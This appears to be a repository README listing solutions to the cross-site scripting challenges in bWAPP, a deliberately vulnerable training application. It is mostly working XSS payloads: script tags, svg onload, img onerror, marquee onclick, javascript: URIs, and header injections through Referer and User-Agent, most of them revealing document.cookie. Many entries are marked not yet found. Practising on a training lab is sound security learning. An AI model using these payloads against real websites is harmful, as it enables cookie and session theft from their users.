Welcome to the repository of comprehensive solutions for bWAPP's Cross-Site Scripting (XSS) challenges, meticulously curated and solved by BugBot19 (Nihar Rathod). This repository serves as a one-stop resource for anyone looking to understand and solve XSS vulnerabilities in the bWAPP (Buggy Web Application) framework.
Topics which are not yet covered:
1)XSS-Reflected(phpMyAdmin)
2)XSS-Stored(SQLiteManager)
3)XSS-Stored(User-Agent)
Some of the payloads are not yet found(NYF)
You can refer to the GitHub-Bwapp-XSS-solution.docx
for more clarity
Payload- <script>alert(document.cookie)</script>(can be inserted in both parameter Firstname and lastname)
Payload- <svg onload=alert(document.cookie)>(Can be inserted in both the parameter Firstname and Lastname)
NYF
Payload-<script>alert(document.cookie)</script>
Payload-<svg onload=alert(document.cookie)>
NYF
Payload - <marquee onclick=alert(document.cookie)>Click on me</marquee>
Payload – NYF
Payload – NYF
Payload - <marquee onclick=alert(1)>Click!!!</marquee>
Payload – NYF
Payload - <img src='#' onerror='alert(document.cookie)'>
Payload - <a href="javascript:x='%27-alert('BugBot19 was here')-%27';">XSS</a>
Payload - ‘-alert(document.cookie)-’
Payload – javascript:alert(document.cookie)
Payload – Same as medium
Javascript:alert(document.cookie)
Payload- bWAPP:<script>alert(document.cookie)</script>
Payload – bWAPP:<marquee onclick=alert(document.cookie)>click to win 1$</marquee>
Paylaod - NYF
Payload – Date=alert(Document.cookie)
Payload – Date=alert(document.cookie)
Payload – NYF
Payload - <marquee onclick=alert(document.cookie)>click to win 1$</marquee>
Payload - NYF
Payload – NYF
Payload – ‘ or 1=1; <script>alert(document.cookie)</script>
Payload – NYF
Payload – NYF
Payload – <a href="javascript:x='%27-alert('BugBot19 was here')-%27';">XSS</a>
Payload – <marquee onclick=alert(document.cookie)>click to win 1$</marquee>
Payload –
Payload – Referer:<svg onload=alert(document.cookie)>
Payload – Referer:<svg onload=alert(document.cookie)>
Payload – NYF
Payload – User-agent:<script>alert(document.cookie)</script>
Payload – User-agent:<svg onload=alert(document.cookie)>
Payload – NYF
Payload – <img src=x onerror=alert(document.cookie)>
Payload – <svg onload=alert(document.cookie)>
Payload – NYF